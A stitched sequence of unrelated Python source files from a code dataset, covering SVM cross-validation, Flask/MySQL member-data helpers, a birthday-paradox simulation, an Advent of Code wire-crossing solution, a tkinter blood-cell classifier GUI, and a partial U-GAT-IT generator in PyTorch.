    data=np.column_stack((X,Y))
    np.random.seed(5)
    np.random.shuffle(data)
    # m,n=np.shape(X)
    # start=(i-1)/k*m
    # end=(i*m/k)
    # sl=slice(0,20,1)
    # data_train=data[sl,:]
    kf = KFold( n_splits=k, shuffle=False)
    kf.get_n_splits(data)
    # The loop overwrites the split variables each iteration; only the
    # final fold survives to the return statement.
    for (train_index, test_index) in kf.split(X):
        # print("TRAIN:", train_index, "TEST:", test_index)
        X_train, X_test = X[train_index], X[test_index]
        Y_train, Y_test = Y[train_index], Y[test_index]
        # print(X_train, X_test)
        # print(Y_train, Y_test)
    return X_test,X_train,Y_test,Y_train
def show_acc(y_hat, y, t):
    """Print the fraction of predictions in y_hat that equal the labels y.

    t selects the message prefix: 'train' or 'test'.
    """
    # BUG FIX: the original computed sum(y_hat - y) / np.shape(y), i.e. the
    # summed signed error divided by a shape TUPLE - not an accuracy.
    # Accuracy is the mean of exact matches.
    acc = np.mean(np.asarray(y_hat) == np.asarray(y))
    if t == 'train':
        print('train accuracy=', acc)
    if t == 'test':
        print('test accuracy=', acc)
def plot_scatter(x, y , t):
    """Scatter-plot 2-D samples x colored by label y.

    Label +1 is drawn as green circles, label -1 as red crosses; the
    figure titled t is shown for 3 seconds and then closed.
    """
    fig = plt.figure()
    ax = fig.add_subplot(111)
    ax.set_title(t)
    plt.xlabel('x')
    plt.ylabel('y')
    idx_1 = np.where(y == 1)
    p1 = ax.scatter(x[idx_1, 0], x[idx_1, 1],
                    marker='o', color='g', label=1, s=20)
    idx_2 = np.where(y == -1)
    p2 = ax.scatter(x[idx_2, 0], x[idx_2, 1],
                    marker='x', color='r', label=2, s=20)
    plt.legend(loc='upper right')
    plt.draw()
    plt.pause(3)
    plt.close()
def plot_line(x,y, tt):
    """Scatter-plot samples like plot_scatter and overlay the true
    decision boundary for the current dataset type.

    NOTE(review): the boundary branch tests the module-global `t`
    (dataset type), not the `tt` argument; tt is only the figure title.
    Confirm this is intended.
    """
    fig = plt.figure()
    ax = fig.add_subplot(111)
    plt.xlabel('x')
    plt.ylabel('y')
    ax.set_title(tt)
    idx_1 = np.where(y == 1)
    p1 = ax.scatter(x[idx_1, 0], x[idx_1, 1],
                    marker='o', color='g', label=1, s=20)
    idx_2 = np.where(y == -1)
    p2 = ax.scatter(x[idx_2, 0], x[idx_2, 1],
                    marker='x', color='r', label=2, s=20)
    if t=='linear' :
        # Boundary of the linear dataset: y = x.
        line_x = np.arange(0, 10, 0.1)
        line_y = line_x
        p3 = ax.plot(line_x, line_y, label="line")
    elif t=='nonlinear':
        # Boundary of the nonlinear dataset: y = -(x - 4)^2 + 8.
        line_x = np.arange(1, 7, 0.1)
        line_y = -(line_x-4)**2+8
        p3 = ax.plot(line_x, line_y, label="line")
    plt.legend(loc='upper right')
    plt.draw()
    plt.pause(3)
    plt.close()
def svm_test(x_train, x_test, y_train, y_test,c):
    """Fit an RBF-kernel SVC with penalty factor c and evaluate it.

    Returns (mean of train/test accuracy, w, a, b, predicted test labels).

    NOTE(review): w, a and b are never assigned in this function (their
    assignments are commented out below), so the return statement resolves
    them as module globals; this only works because the __main__ block
    sets w = a = b = 0 before calling svm_test.
    """
    # X, Y is training data,c is Penalty factor
    clf=svm.SVC(C=c,kernel='rbf',decision_function_shape='ovo')
    clf.fit(x_train,y_train)
    train_acc=clf.score(x_train, y_train)
    test_acc=clf.score(x_test, y_test)
    # print('train accuracy=', train_acc) # accuracy
    # y_hat_train = clf.predict(x_train)
    # plot_line(x_train, y_hat, 'train')
    # show_acc(y_hat, y_train, 'train')
    # print('test accuracy=',test_acc)
    y_hat_test = clf.predict(x_test)
    # plot_line(x_test, y_hat, 'test')
    # show_acc(y_hat, y_test, 'test')
    total_acc=(train_acc+test_acc)/2
    # w = clf.coef_[0]
    # a = -w[0] / w[1]
    # b=clf.intercept_[0]
    # xx = np.linspace(-5, 5)
    # yy = a * xx - intercept / w[1]
    # plot the parallels to the separating hyperplane that pass through the support vectors
    # a=clf.support_vectors_[:]
    # b = clf.support_vectors_[0]
    # yy_down = a * xx + (b[1] - a * b[0])
    # b = clf.support_vectors_[-1]
    # yy_up = a * xx + (b[1] - a * b[0])
    # print("w: ", w)
    # print("a: ", a)
    # print "xx: ", xx
    # print "yy: ", yy
    # print("support_vectors_: ", clf.support_vectors_)
    # print("clf.coef_: ", clf.coef_)
    # plot the line, the points, and the nearest vectors to the plane
    # pl.plot(xx, yy, 'k-')
    # pl.plot(xx, yy_down, 'k--')
    # pl.plot(xx, yy_up, 'k--')
    #
    # pl.scatter(clf.support_vectors_[:, 0], clf.support_vectors_[:, 1],
    #            s=80, facecolors='none')
    # pl.scatter(X[:, 0], X[:, 1], c=Y, cmap=pl.cm.Paired)
    #
    # pl.axis('tight')
    # pl.show()
    return total_acc,w,a,b,y_hat_test
if __name__ == "__main__":
    # NOTE(review): time.clock() was removed in Python 3.8; this script
    # needs an older interpreter (or time.perf_counter()) to run.
    start = time.clock()
    X,Y=generator(sample_num, t)
    plot_line(X, Y, t)
    # svm_test(X,Y)
    # data=cross_va(X,Y,5,1)
    data=np.column_stack((X,Y))
    np.random.seed(5)
    np.random.shuffle(data)
    # NOTE(review): `data` is shuffled but kf.split below runs on the
    # unshuffled X - the shuffle has no effect on the folds.
    kf = KFold( n_splits=k, shuffle=False)
    kf.get_n_splits(data)
    # factor initiate
    acc=0
    a=0
    b=0
    w=0
    # Grid-search the penalty factors over every fold, keeping the split,
    # predictions and C value of the best mean train/test accuracy.
    for (train_index, test_index) in kf.split(X):
        X_train, X_test = X[train_index], X[test_index]
        Y_train, Y_test = Y[train_index], Y[test_index]
        for i in c:
            acct,w_t,a_t,b_t,y_hat_test=svm_test(X_train,X_test,Y_train,Y_test,i)
            # print(acct)
            if acc > acct :
                continue
            else :
                acc=acct
                # w,a,b=w_t,a_t,b_t
                XX=X_test
                YY=y_hat_test
                cc=i
    print('Total accuracy =',acc)
    print('C =',cc)
    plot_line(XX, YY, 'test')
    # xx = np.linspace(1, 7)
    # yy = -(w[0]/w[1]) * xx - b / w[1]
    # a1 = a[0]
    # yy_down = -(w[0]/w[1]) * xx + (a1[1] +(w[0]/w[1]) * a1[0])
    # a2 = a[-1]
    # yy_up = -(w[0]/w[1]) * xx + (a2[1] +(w[0]/w[1]) * a2[0])
    #
    # fig = plt.figure()
    # ax = fig.add_subplot(111)
    # plt.xlabel('x')
    # plt.ylabel('y')
    # ax.set_title('final')
    # plt.plot(xx, yy, 'k-')
    # plt.plot(xx, yy_down, 'k--')
    # plt.plot(xx, yy_up, 'k--')
    # idx_1 = np.where(YY == 1)
    # p1 = ax.scatter(XX[idx_1, 0], XX[idx_1, 1],
    #                 marker='o', color='g', label=1, s=20)
    # idx_2 = np.where(YY == -1)
    # p2 = ax.scatter(XX[idx_2, 0], XX[idx_2, 1],
    #                 marker='x', color='r', label=2, s=20)
    # plt.scatter(a[:, 0], a[:, 1],
    #             s=80, facecolors='none')
    # plt.scatter(X[:, 0], X[:, 1], c=Y, cmap=plt.cm.Paired)
    plt.legend(loc='upper right')
    plt.draw()
    plt.pause(3)
    plt.close()
    end = time.clock()
    print('finish all in %s' % str(end - start))
| true |
a4f6108cef791f6cd7b064673023e5873ba84fba | Python | ASCIT/donut | /donut/modules/core/helpers.py | UTF-8 | 5,794 | 3 | 3 | [
"MIT"
] | permissive | import flask
import pymysql.cursors
def get_member_data(user_id, fields=None):
    """Fetch member data for a single user_id or a list of user_ids.

    Arguments:
        user_id: one id or a list of ids to look up.
        fields:  columns to return; defaults to default_fields below.
    Returns:
        A dict of column -> value for exactly one match, a sequence of such
        dicts for several matches, {} for no match (or an empty id list),
        or the string "Invalid field" when an unknown field is requested.
    """
    all_returnable_fields = [
        "user_id", "uid", "last_name", "first_name", "middle_name",
        "preferred_name", "email", "phone", "gender", "gender_custom",
        "birthday", "entry_year", "graduation_year", "msc", "building",
        "room_num", "address", "city", "state", "zip", "country"
    ]
    default_fields = [
        "user_id", "first_name", "last_name", "email", "uid", "entry_year",
        "graduation_year"
    ]
    if fields is None:
        fields = default_fields
    elif any(f not in all_returnable_fields for f in fields):
        return "Invalid field"
    user_ids = user_id if isinstance(user_id, list) else [user_id]
    if not user_ids:
        # Edge case: an empty list of ids matches nothing.
        return {}
    # Field names are validated against the whitelist above; ids are bound
    # as query parameters.
    placeholders = ' OR '.join('user_id=%s' for _ in user_ids)
    query = "SELECT {} FROM members WHERE {}".format(', '.join(fields), placeholders)
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute(query, user_ids)
        rows = cursor.fetchall()
    if not rows:
        return {}
    if len(rows) == 1:
        return rows[0]
    return rows
def get_member_list_data(fields=None, attrs=None):
    """
    Queries the database and returns list of member data constrained by the
    specified attributes.

    Arguments:
        fields: The fields to return. If None specified, then default_fields
                are used.
        attrs:  The attributes of the members to filter for (column -> value).
                None (the default) means no filtering.
    Returns:
        result: The fields and corresponding values of members with desired
                attributes, as a list of dicts of columnname:columnvalue,
                or the string "Invalid field" for an unknown field.
    """
    all_returnable_fields = [
        "user_id", "uid", "last_name", "first_name", "middle_name", "email",
        "phone", "gender", "gender_custom", "birthday", "entry_year",
        "graduation_year", "msc", "building", "room_num", "address", "city",
        "state", "zip", "country"
    ]
    default_fields = [
        "user_id", "first_name", "last_name", "email", "uid", "entry_year",
        "graduation_year"
    ]
    # FIX: avoid the mutable-default-argument pitfall (was attrs={}); also
    # makes an explicit attrs=None call valid.
    if attrs is None:
        attrs = {}
    if fields is None:
        fields = default_fields
    elif any(f not in all_returnable_fields for f in fields):
        return "Invalid field"
    query = "SELECT " + ', '.join(fields) + " FROM members"
    if attrs:
        # NOTE: attribute *names* are interpolated into the SQL text and
        # must come from trusted code; only the values are parameterized.
        query += " WHERE "
        query += ' AND '.join([key + "= %s" for key in attrs])
    values = list(attrs.values())
    # Execute the query
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute(query, values)
        return cursor.fetchall()
def get_name_and_email(user_id):
    """Fetch the full name and email address of one member.

    Arguments:
        user_id: id of the member to look up.
    Returns:
        A row with keys 'full_name' and 'email', or None when the
        user_id does not exist.
    """
    query = """
    SELECT full_name, email
    FROM members NATURAL LEFT JOIN members_full_name
    WHERE user_id = %s
    """
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute(query, user_id)
        row = cursor.fetchone()
    return row
def get_group_list_of_member(user_id):
    """List every group the given member currently holds a position in.

    Arguments:
        user_id: id of the member to query.
    Returns:
        A list of rows, each with group_id, group_name and the
        admin/control flag.
    """
    query = """
    SELECT DISTINCT group_id, group_name, control
    FROM groups NATURAL JOIN positions NATURAL JOIN current_position_holders
    WHERE user_id = %s
    """
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute(query, [user_id])
        rows = cursor.fetchall()
    return list(rows)
def set_image(user_id, extension, contents):
    """Replace the stored image for user_id: delete any existing row,
    then insert the new extension and image bytes."""
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute('DELETE FROM images WHERE user_id = %s', [user_id])
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute(
            'INSERT INTO images (user_id, extension, image) VALUES (%s, %s, %s)',
            [user_id, extension, contents])
def get_preferred_name(user_id):
    """Return the member's preferred name, or '' when unset."""
    data = get_member_data(user_id, ['preferred_name'])
    return data['preferred_name'] or ''
def get_gender(user_id):
    """Return the member's custom gender string, or '' when unset."""
    data = get_member_data(user_id, ['gender_custom'])
    return data['gender_custom'] or ''
def set_member_field(user_id, field, value):
    """Set one column of the member row identified by user_id.

    SECURITY: `field` is interpolated into the SQL text (backtick-quoted);
    it must only ever come from trusted code, never from user input. The
    value and user_id are safely parameterized.
    """
    query = 'UPDATE members SET `' + field + '` = %s WHERE user_id = %s'
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute(query, [value, user_id])
def get_news():
    """Return all news rows, newest (highest news_id) first."""
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute('SELECT * FROM news ORDER BY news_id DESC')
        return cursor.fetchall()
def add_news(news):
    """Insert a news item; `news` supplies the news_text value."""
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute('INSERT INTO news(news_text) VALUES (%s)', news)
def delete_news(news_id):
    """Delete the news item with the given news_id."""
    with flask.g.pymysql_db.cursor() as cursor:
        cursor.execute('DELETE FROM news WHERE news_id = %s', news_id)
| true |
e37606936965b0d63c1f4c82850e0b2f26d01186 | Python | shakthi-sambas/x9115SNN | /hw/code/3/Birthday.py | UTF-8 | 1,256 | 3.59375 | 4 | [] | no_license | __author__ = 'Nakul'
"""This module contains code from
Think Python by Allen B. Downey
http://thinkpython.com
Copyright 2012 Allen B. Downey
License: GNU GPLv3 http://www.gnu.org/licenses/gpl.html
"""
import random
# Banner for the exercise output.
print ("####################")
print ("Solution for Exercise 10.8")
print ("####################")
# This is the solution to 10.8 part 1
def has_duplicates(inpt):
    """Return True when inpt contains any repeated element.

    The input is not modified; a sorted copy is scanned for equal
    neighbours.
    """
    ordered = sorted(inpt)
    return any(a == b for a, b in zip(ordered, ordered[1:]))
# This part contains solution to part 2 which utilizes function from part 1
def rand_bday_generate(num_of_samples):
    """Return a list of num_of_samples random birthdays, each encoded as
    a day-of-year in 1..365."""
    return [random.randint(1, 365) for _ in range(num_of_samples)]
def birthday_paradox():
    """Simulate 5000 classes of 23 students; return how many classes
    contain at least one shared birthday."""
    num_stud = 23
    runs = 5000
    return sum(
        1 for _ in range(runs)
        if has_duplicates(rand_bday_generate(num_stud))
    )
# Run the simulation and report results (Python 2 print statements).
count = birthday_paradox()
print "Number of runs = 5000"
print "Number of students per run = 23"
print "Number of runs with atleast 1 match = %d" % count
print 'Chance (number of runs with matches/5000) = %s percent' % (float(count)*100.0/5000.0)
| true |
cfedc0c8ee0c4281cab88cf59743d0b58abacfb4 | Python | csdorman/My-Code-Learning | /AdventOfCode/2019/day3.py | UTF-8 | 2,157 | 3.515625 | 4 | [] | no_license |
# Using "taxicab geometry" (grid): https://en.wikipedia.org/wiki/Taxicab_geometry
# Reddit hints for day 3: https://www.reddit.com/r/adventofcode/comments/e5bz2w/2019_day_3_solutions/
# Walkthrough (in php) is here for thought process: https://hwright.com/advent-of-code-hints-2019
# test 1
# wire 1: R8,U5,L5,D3
# wire 2: U7,R6,D4,L4
# distance from crossing to start: 3 + 3 = 6
# steps: 30
# test 2
# R75,D30,R83,U83,L12,D49,R71,U7,L72
# U62,R66,U55,R34,D71,R55,D58,R83
# distance: 159
# steps: 610
# test 3
# R98,U47,R26,D63,R33,U87,L62,D20,R33,U53,R51
# U98,R91,D20,R16,D67,R40,U7,R15,U6,R7
# distance: 135
# steps: 410
import sys
def calc_step_points(path):
    """Trace a wire path (e.g. ['R8', 'U5', 'L5', 'D3']) from the origin.

    Returns a dict mapping each visited (x, y) grid point to the step
    count at which the wire FIRST reached it; the origin itself is not
    included.
    """
    deltas = {'R': (1, 0), 'L': (-1, 0), 'U': (0, 1), 'D': (0, -1)}
    visited = {}
    x = y = steps = 0
    for move in path:
        step_x, step_y = deltas[move[0]]
        for _ in range(int(move[1:])):
            x, y = x + step_x, y + step_y
            steps += 1
            # setdefault keeps the earliest step count on revisits.
            visited.setdefault((x, y), steps)
    return visited
# Read the two comma-separated wire paths from the puzzle input file.
wire1_path, wire2_path = open('wire-grid.txt').read().split()
wire1_path, wire2_path = wire1_path.split(','), wire2_path.split(',')
wire1_points = calc_step_points(wire1_path)
wire2_points = calc_step_points(wire2_path)
# Grid points both wires visit.
intersection_points = [point for point in wire1_points if point in wire2_points]
#print(wire1_points, wire2_points)
#print(intersection_points)
# Part 1: intersection closest to the origin by Manhattan distance.
part1 = min(abs(x) + abs(y) for (x, y) in intersection_points)
print("Part 1 answer is:", part1)
# Part 2: intersection minimizing the combined step counts of both wires.
part2 = min(wire1_points[point] + wire2_points[point] for point in intersection_points)
print("Part 2 answer is", part2) | true |
fb1d752668c79008646b64563f84bf6cdb8e8eb6 | Python | amithreddytadwai/Image-Classification-of-Abnormal-Red-Blood-Cells-Using-Decision-Tree-Algorithm | /final.py | UTF-8 | 7,675 | 2.71875 | 3 | [] | no_license | import tkinter
from tkinter import messagebox
from tkinter import simpledialog
from tkinter import filedialog
from tkinter.filedialog import askopenfilename
from tkinter import *
import numpy as np
import pandas as pd
from sklearn.metrics import classification_report,confusion_matrix,accuracy_score
from sklearn.model_selection import train_test_split,KFold,cross_val_score
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, BaggingClassifier, AdaBoostClassifier
import matplotlib.pyplot as plt
from sklearn.preprocessing import scale
import cv2
import mahotas as mt
import warnings
warnings.filterwarnings('ignore')
# Root Tk window for the application GUI.
main = tkinter.Tk()
main.title("Blood Cell classification")
main.geometry("1300x1200")
class test:
    def upload():
        """Ask the user for a dataset file and remember its path globally."""
        global filename
        text.delete('1.0', END)
        filename = askopenfilename(initialdir = "Dataset")
        pathlabel.config(text=filename)
        text.insert(END,"Dataset loaded\n\n")
    def csv():
        """Load the selected CSV into the global DataFrame and preview it."""
        global data
        text.delete('1.0', END)
        data=pd.read_csv(filename)
        text.insert(END,"Top Five rows of dataset\n"+str(data.head())+"\n")
        text.insert(END,"Last Five rows of dataset\n"+str(data.tail()))
        # NOTE(review): raises KeyError if the CSV has no 'Unnamed: 0'
        # column (pandas drop defaults to errors='raise') - confirm the
        # dataset always carries that index column.
        data.drop('Unnamed: 0',axis=1,inplace=True)
    def splitdataset():
        """Split the loaded data 80/20 with a fixed seed and return
        (X_train, X_test, y_train, y_test).

        The last column is treated as the label; all others are features.
        """
        text.delete('1.0', END)
        #print(data.columns)
        X = data.iloc[:,:-1]
        Y = data.iloc[:,-1]
        X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size = 0.2, random_state = 15)
        text.insert(END,"\nTrain & Test Model Generated\n\n")
        text.insert(END,"Total Dataset Size : "+str(len(data))+"\n")
        text.insert(END,"Split Training Size : "+str(len(X_train))+"\n")
        text.insert(END,"Split Test Size : "+str(len(X_test))+"\n")
        return X_train, X_test, y_train, y_test
    def MLmodels():
        """Cross-validate four tree/ensemble classifiers and report results.

        Fits each model, logs its 10-fold CV accuracy and test-set
        predictions to the text widget, and keeps the fitted Bagging
        model as the global model_final for later single-image prediction.

        NOTE(review): KFold(n_splits=10, random_state=7) without
        shuffle=True is rejected by newer scikit-learn releases - confirm
        against the pinned version.
        """
        global model_final
        X_train, X_test, y_train, y_test=test.splitdataset()
        text.delete('1.0', END)
        models=[]
        models.append(('RandomForest',RandomForestClassifier()))
        models.append(('DecisionTree',DecisionTreeClassifier()))
        models.append(('Adaboost',AdaBoostClassifier()))
        models.append(('Bagging',BaggingClassifier()))
        results=[]
        names=[]
        predicted_values=[]
        text.insert(END,"Machine Learning Classification Models\n")
        text.insert(END,"Predicted values,Accuracy Scores and S.D values from ML Classifiers\n\n")
        for name,model in models:
            kfold=KFold(n_splits=10,random_state=7)
            cv_results=cross_val_score(model,X_train,y_train,cv=kfold,scoring='accuracy')
            model.fit(X_train,y_train)
            predicted=model.predict(X_test)
            predicted_values.append(predicted)
            results.append(cv_results.mean()*100)
            names.append(name)
            text.insert(END,"\n"+str(name)+" "+"Predicted Values on Test Data:"+str(predicted)+"\n\n")
            text.insert(END, "%s: %f\t\t(%f)\n" %(name,cv_results.mean()*100,cv_results.std()))
            if name == 'Bagging':
                model_final=model
        return results
def graph():
results=test.MLmodels()
bars = ('RandomForest','DecisionTree','Adaboost','Bagging')
y_pos = np.arange(len(bars))
plt.bar(y_pos, results)
plt.xticks(y_pos, bars)
plt.show()
def singleImage():
global testfile
main_img = cv2.imread(testfile)
#Preprocessing
img = cv2.cvtColor(main_img, cv2.COLOR_BGR2RGB)
gs = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
blur = cv2.GaussianBlur(gs, (25,25),0)
ret_otsu,im_bw_otsu = cv2.threshold(blur,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)
kernel = np.ones((50,50),np.uint8)
closing = cv2.morphologyEx(im_bw_otsu, cv2.MORPH_CLOSE, kernel)
#Shape features
contours, image = cv2.findContours(closing,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
cnt = contours[0]
M = cv2.moments(cnt)
area = cv2.contourArea(cnt)
perimeter = cv2.arcLength(cnt,True)
x,y,w,h = cv2.boundingRect(cnt)
aspect_ratio = float(w)/h
rectangularity = w*h/area
circularity = ((perimeter)**2)/area
#Color features
red_channel = img[:,:,0]
green_channel = img[:,:,1]
blue_channel = img[:,:,2]
blue_channel[blue_channel == 255] = 0
green_channel[green_channel == 255] = 0
red_channel[red_channel == 255] = 0
red_mean = np.mean(red_channel)
green_mean = np.mean(green_channel)
blue_mean = np.mean(blue_channel)
red_std = np.std(red_channel)
green_std = np.std(green_channel)
blue_std = np.std(blue_channel)
#Texture features
textures = mt.features.haralick(gs)
ht_mean = textures.mean(axis=0)
contrast = ht_mean[1]
correlation = ht_mean[2]
inverse_diff_moments = ht_mean[4]
entropy = ht_mean[8]
vector = [area,perimeter,w,h,aspect_ratio,rectangularity,circularity, red_mean,green_mean,blue_mean,red_std,green_std,blue_std,
contrast,correlation,inverse_diff_moments,entropy]
return vector
def pred():
global model_final
global testfile
text.delete('1.0', END)
testfile = askopenfilename(initialdir = "Dataset")
text.insert(END,"Predict File Selected\n\n")
vector = test.singleImage()
test_data = pd.DataFrame([vector])
pred=model_final.predict(test_data)
classess=['Lymphocyte','Monocyte','Neutrophil','Eosinophil']
print(pred)
text.insert(END,"For Image "+str(filename)+" Predicted Output is "+str(classess[pred[0]-1])+"\n")
# ---- Static window chrome -------------------------------------------------
font = ('times', 16, 'bold')
title = Label(main, text='Image Classification of Abnormal Red Blood Cells Using Decision Tree Algorithm')
title.config(bg='sky blue', fg='black')
title.config(font=font)
title.config(height=3, width=120)
title.place(x=0,y=5)
# ---- Buttons wired to the `test` callbacks --------------------------------
font1 = ('times', 14, 'bold')
upload = Button(main, text="Upload Dataset", command=test.upload)
upload.place(x=700,y=100)
upload.config(font=font1)
# Shows the path of the dataset chosen via test.upload().
pathlabel = Label(main)
pathlabel.config(bg='royal blue', fg='white')
pathlabel.config(font=font1)
pathlabel.place(x=700,y=150)
df = Button(main, text="Reading Data ", command=test.csv)
df.place(x=700,y=200)
df.config(font=font1)
split = Button(main, text="Train_Test_Split ", command=test.splitdataset)
split.place(x=700,y=250)
split.config(font=font1)
ml= Button(main, text="All Classifiers", command=test.MLmodels)
ml.place(x=700,y=300)
ml.config(font=font1)
graph= Button(main, text="Model Comparison", command=test.graph)
graph.place(x=700,y=350)
graph.config(font=font1)
pre= Button(main, text="Predict", command=test.pred)
pre.place(x=700,y=400)
pre.config(font=font1)
# ---- Shared output console used by every callback -------------------------
font1 = ('times', 12, 'bold')
text=Text(main,height=30,width=80)
scroll=Scrollbar(text)
text.configure(yscrollcommand=scroll.set)
text.place(x=10,y=100)
text.config(font=font1)
main.config(bg='powder blue')
# Enter the Tk event loop (blocks until the window is closed).
main.mainloop()
| true |
54dc1f2709f7fa41f1bd9f9ba46da62ad0a8f9b3 | Python | Thatsgaurav/niet-Python-Lab | /Problem Solving using Python Lab. Index/50.largest_of_three_numbers.py | UTF-8 | 468 | 4.4375 | 4 | [] | no_license | # WAP to find the largest of three numbers using user defined function
def find_largest(a=None, b=None, c=None): #function definition
    """Print and return the largest of three numbers.

    With no arguments the module-level globals ``num1``/``num2``/``num3``
    (read from user input below) are used, so the original
    ``find_largest()`` call still works; passing explicit values makes the
    function reusable and testable.

    Bug fix: the original first branch tested ``num1 >= num2`` twice
    instead of also comparing against ``num3``, so e.g. (5, 1, 9) wrongly
    reported 5 as the largest.
    """
    if a is None:
        a = num1
    if b is None:
        b = num2
    if c is None:
        c = num3
    # max() handles all orderings, including ties.
    largest = max(a, b, c)
    print("Largest number is", largest)
    return largest
# Script entry: read three integers from stdin, then report the largest.
num1 = int(input("Enter the first number: "))
num2 = int(input("Enter the second number: "))
num3 = int(input("Enter the Third number: "))
find_largest()
58e604bbfb35444bf497e9845077a1565bed8147 | Python | tom99763/U-GAT-IT-implement | /model.py | UTF-8 | 10,675 | 2.515625 | 3 | [] | no_license | import torch
import torch.nn as nn
import torch.nn.functional as F
class ResBlock(nn.Module):
    """Residual block: returns x + F(x), where F is two reflection-padded
    3x3 convolutions with instance normalisation and a ReLU in between."""

    def __init__(self, channels):
        super().__init__()
        layers = []
        for stage in range(2):
            layers.append(nn.ReflectionPad2d(1))
            layers.append(nn.Conv2d(in_channels=channels, out_channels=channels,
                                    kernel_size=(3, 3), stride=(1, 1), bias=False))
            layers.append(nn.InstanceNorm2d(num_features=channels))
            if stage == 0:
                # ReLU only between the two conv stages, not after the last norm.
                layers.append(nn.ReLU(inplace=True))
        self.conv = nn.Sequential(*layers)

    def forward(self, x):
        residual = self.conv(x)
        return x + residual
class Adapolin_Stack(nn.Module):
    """Residual block whose normalisation is AdaLIN with externally supplied
    (gamma, beta): conv -> AdaLIN -> ReLU -> conv -> AdaLIN, plus skip."""
    def __init__(self,channels):
        super().__init__()
        self.act=nn.ReLU(inplace=True)
        self.conv1=nn.Sequential(
            nn.ReflectionPad2d(1),
            nn.Conv2d(in_channels=channels, out_channels=channels,
                      kernel_size=(3, 3), stride=(1, 1),bias=False),
        )
        self.conv2=nn.Sequential(
            nn.ReflectionPad2d(1),
            nn.Conv2d(in_channels=channels, out_channels=channels,
                      kernel_size=(3, 3), stride=(1, 1),bias=False)
        )
        # eat=True: gamma/beta come from the caller (the generator's MLP)
        # rather than being learned parameters of the norm itself.
        self.adapolin1=AdaLIN(channels=channels,eat=True)
        self.adapolin2=AdaLIN(channels=channels,eat=True)
    def forward(self,x,gamma=None,beta=None):
        """gamma/beta must be provided (shape broadcastable to the feature
        map) because the AdaLIN layers were built with eat=True."""
        o=self.conv1(x)
        o=self.adapolin1(o,gamma,beta)
        o=self.act(o)
        o=self.conv2(o)
        o=self.adapolin2(o,gamma,beta)
        return o+x
class AdaLIN(nn.Module):
    """Adaptive Layer-Instance Normalisation: blends instance norm and layer
    norm with a learned ratio `rho`, then applies an affine (gamma, beta)
    which is either learned (eat=False) or supplied by the caller (eat=True).
    """
    def __init__(self,channels,eat=False):
        super().__init__()
        self.eat=eat
        self.In=nn.InstanceNorm2d(num_features=channels)
        # Per-channel mixing weight between instance norm and layer norm.
        # NOTE: nn.Parameter over torch.Tensor(...) is uninitialised memory
        # until the fill_() calls below run.
        self.rho = nn.Parameter(data=torch.Tensor(1, channels, 1, 1))
        if not self.eat:
            # Learned affine, initialised to the identity transform.
            self.gamma=nn.Parameter(data=torch.Tensor(1,channels,1,1))
            self.beta = nn.Parameter(data=torch.Tensor(1, channels, 1, 1))
            self.gamma.data.fill_(1.0)
            self.beta.data.fill_(0.0)
            self.rho.data.fill_(0.0)
        else:
            self.rho.data.fill_(0.9)
    def forward(self,x,gamma=None,beta=None):
        In=self.In(x)
        # Layer norm computed by hand over (C, H, W) per sample.
        Ln=(x-torch.mean(x,dim=[1,2,3],keepdim=True))/(torch.sqrt(torch.var(x,dim=[1,2,3],keepdim=True))+1e-5)
        x=self.rho*In+(1-self.rho)*Ln
        if self.eat:
            # Caller-supplied affine (required when eat=True).
            x=gamma*x+beta
        else:
            x=self.gamma*x+self.beta
        return x
'''
x=torch.randn(1,256,32,32)
gamma=torch.randn(1,256,1,1)
beta=torch.randn(1,256,1,1)
ada=Adapolin_Stack(256)
res=ResBlock(256)
print(ada(x,gamma,beta).shape)
print(res(x).shape)
'''
class Generator(nn.Module):
    """U-GAT-IT-style generator: downsampling encoder, residual bottleneck,
    CAM attention (gap/gmp logits), an MLP producing the (gamma, beta) used
    by the AdaLIN residual blocks, then an upsampling decoder ending in tanh.
    Returns (image, cam_logits, heatmap)."""
    def __init__(self,base=64,n_res=4,downsample=2):
        super().__init__()
        self.downsample=downsample
        self.base=base
        self.n_res=n_res
        self.down=[]
        self.up=[]
        # Stem: 7x7 conv from RGB to `base` channels.
        self.down+=[nn.ReflectionPad2d(3),
                    nn.Conv2d(in_channels=3,out_channels=self.base,
                              kernel_size=(7,7),
                              stride=(1,1),
                              bias=False),
                    nn.InstanceNorm2d(self.base),
                    nn.ReLU(inplace=True)
                    ]
        for i in range(self.downsample):
            self.scale=2**(i)
            # NOTE(review): InstanceNorm2d is built with self.base*2 channels
            # regardless of i, while the conv outputs base*scale*2. Harmless
            # at runtime (num_features is unused without affine/running
            # stats) but looks like it was meant to be self.base*self.scale*2
            # — confirm.
            self.down+=[nn.ReflectionPad2d(1),
                    nn.Conv2d(in_channels=self.base*self.scale,out_channels=self.base*self.scale*2,
                              kernel_size=(3,3),
                              stride=(2,2),
                              bias=False),
                    nn.InstanceNorm2d(self.base*2),
                    nn.ReLU(inplace=True)
                    ]
        # Bottleneck residual blocks at the deepest channel count
        # (self.scale keeps its value from the last loop iteration).
        self.res=[ResBlock(self.base*self.scale*2) for _ in range(self.n_res)]
        # CAM heads: 1-logit linear layers over max/avg pooled features.
        self.gmp_fc=nn.Linear(in_features=self.base*self.scale*2,
                              out_features=1,bias=False)
        self.gap_fc = nn.Linear(in_features=self.base * self.scale * 2,
                                out_features=1, bias=False)
        # 1x1 conv fusing the concatenated gap/gmp attention maps.
        self.conv11=nn.Conv2d(in_channels=self.base*self.scale*4,
                              out_channels=self.base*self.scale*2,
                              kernel_size=(1,1),
                              stride=(1,1))
        self.act=nn.ReLU(inplace=True)
        # MLP that maps pooled features to the AdaLIN (gamma, beta).
        self.mlp=[nn.Linear(in_features=self.base*self.scale*2,
                            out_features=self.base*self.scale*2,bias=False),
                  nn.ReLU(inplace=True),
                  nn.Linear(in_features=self.base * self.scale * 2,
                            out_features=self.base * self.scale * 2, bias=False),
